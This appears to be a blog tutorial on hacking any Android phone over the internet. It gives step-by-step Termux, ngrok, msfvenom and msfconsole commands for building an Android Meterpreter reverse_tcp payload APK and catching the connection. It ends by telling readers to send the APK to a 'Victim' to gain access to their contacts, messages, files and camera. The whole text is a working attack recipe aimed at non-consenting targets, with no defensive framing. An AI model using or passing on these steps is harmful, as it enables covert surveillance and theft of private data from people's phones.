Header Ads Widget

Ticker

6/recent/ticker-posts

Hack any Android Smartphone over WAN(Internet) on Android using Termux/Kali Linux - Nur tech solution

 Hack any Android Smartphone over WAN (Internet) on Android using Termux / Kali Linux / Linux


If you know the basic use of Metasploit's Meterpreter payload Android Hacking over LAN/WLAN then this tutorial might be easier to Understand...So, let's have a look How. You can ‘Hack any Android Smartphone over WAN’.


First of All you must need to install Termux.
Don't know what's Termux?
Really...If you don't know what's Termux and own an Android Smartphone (or a Beginner) you may be an alien.

Termux: Linux Terminal Emulator for Android
Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager.

Download Termux by clicking here: https://termux.com



Second thing, You must need to have a basic idea about ‘Metasploit’

Metasploit: The world’s most used penetration testing framework
Metasploit aka Metasploit Framework tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

How to Install Metasploit On Termux: https://youtu.be/DdTnzrtnpMU


MUST CHECK OUT BEFORE STARTING THIS PROCESS (TUTORIAL):
[Video]
• How to Install ngrok in Termux/Linux: https://youtu.be/rGHwL70TLQA

• ngrok problems(Solved): https://youtu.be/HVSB57kJnH0



[!] Here are Commands for the following processes:

>>Update & Upgrade: apt update && apt upgrade

>>Install binutils pakage: pkg install binutils

>>Start ngrok(using TCP port) : ./ngrok tcp 4444

[Open New Tab/session]: by swiping from Left(corner) to Right

>> Make payload: msfvenom -p android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=X0X0X R > /sdcard/payload.apk

*To Find LHOST * - [Open New Tab/session]:
>>Type: host "forwarding add"


*Check your LPORT on ngrok*
Example with Image:
In my case:
Forwarding add.: 2.tcp.ngrok.io
LPORT: 18974

[After generating of payload]
>>Open Metasploit: msfconsole
>> use /multi/handler
>> set payload android/meterpreter/reverse_tcp
>> set LHOST 0.0.0.0 (localhost)
>> set LPORT 4444
>> run

*Now Send payload.apk to Victim and after it's Installation you will have the access over Victim's personal informations.(contacts, messages, files, device info, Camera,etc.) and it doesn't matters wherever Victim is present at the location.

Post a Comment

0 Comments